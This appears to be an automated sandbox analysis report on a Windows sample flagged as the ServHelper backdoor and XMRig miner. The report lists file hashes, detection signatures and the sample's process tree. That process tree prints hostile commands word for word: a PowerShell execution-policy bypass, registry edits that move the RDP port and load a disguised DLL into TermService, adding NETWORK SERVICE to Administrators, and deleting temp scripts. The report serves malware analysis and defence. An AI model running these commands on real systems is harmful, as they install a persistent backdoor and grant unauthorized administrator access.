Overview

overview

10

Static

static

748b112881...8e.exe

windows7_x64

1

748b112881...8e.exe

windows10_x64

10

Analysis

  • max time kernel
    116s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    26-09-2021 15:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    748b112881047820f530c202bb59488e.exe

  • Size

    4.0MB

  • MD5

    748b112881047820f530c202bb59488e

  • SHA1

    edf77f969bf54a47b21e6179cbcabb4651706d7c

  • SHA256

    82285ac0988c68f9b9ecc7649cb9c6a3f3ecb242dd198465dbd4236d7fa6a59c

  • SHA512

    252640d935ce3c7885fa48496b1b9c405f5dc9e719eda9c965d5fec46f877c00a7d96b14acf7410fbef9dbbfa9723932b54cdc75084fdd54e492eaa8d6f37ad6

Score
10/10
servhelperxmrigbackdoorminerpersistencetrojan

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe
    "C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgsr5gx1\wgsr5gx1.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4056
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2CB.tmp" "c:\Users\Admin\AppData\Local\Temp\wgsr5gx1\CSC25A62393E6D843C397C3F863D8835D3E.TMP"
          4⤵
            PID:2912
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3628
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:512
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3952
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:640
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3248
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1340
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1676
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1796
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2588
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3856
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2636
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3052
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2864
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3836
                    • C:\Windows\SysWOW64\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3840
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3296
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:916
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:1312

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/512-442-0x0000000006722000-0x0000000006723000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/512-440-0x0000000006720000-0x0000000006721000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/512-467-0x000000007EF60000-0x000000007EF61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-121-0x00000000010E0000-0x00000000010E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-119-0x0000000005BA0000-0x0000000005BA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-120-0x0000000005840000-0x0000000005841000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-123-0x0000000000303000-0x0000000000304000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-118-0x0000000000302000-0x0000000000303000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-117-0x0000000000300000-0x0000000000301000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-122-0x0000000007CE0000-0x0000000007CE1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-124-0x0000000000304000-0x0000000000305000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2412-115-0x00000000052A0000-0x000000000569F000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/2612-131-0x0000000007F80000-0x0000000007F81000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-144-0x0000000009F50000-0x0000000009F51000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-153-0x0000000007460000-0x0000000007461000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-128-0x0000000005180000-0x0000000005181000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-155-0x0000000005133000-0x0000000005134000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-176-0x0000000009A30000-0x0000000009A31000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-129-0x0000000007800000-0x0000000007801000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-135-0x0000000005132000-0x0000000005133000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-130-0x0000000007EE0000-0x0000000007EE1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-136-0x0000000008050000-0x0000000008051000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-137-0x0000000008A90000-0x0000000008A91000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-138-0x0000000008930000-0x0000000008931000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-133-0x0000000008240000-0x0000000008241000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-134-0x0000000005130000-0x0000000005131000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-1124-0x000000007ED20000-0x000000007ED21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2612-145-0x0000000009670000-0x0000000009671000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-212-0x000000007F090000-0x000000007F091000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-182-0x0000000005090000-0x0000000005091000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-183-0x0000000005092000-0x0000000005093000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-198-0x0000000008CA0000-0x0000000008CD3000-memory.dmp

                    Filesize

                    204KB

                    Download

                  • memory/3628-412-0x0000000008F20000-0x0000000008F21000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-406-0x0000000008F30000-0x0000000008F31000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-213-0x0000000008F90000-0x0000000008F91000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-206-0x0000000008C80000-0x0000000008C81000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3628-211-0x0000000008DE0000-0x0000000008DE1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3952-723-0x000000007F7B0000-0x000000007F7B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3952-699-0x0000000006C22000-0x0000000006C23000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3952-698-0x0000000006C20000-0x0000000006C21000-memory.dmp

                    Filesize

                    4KB

                    Download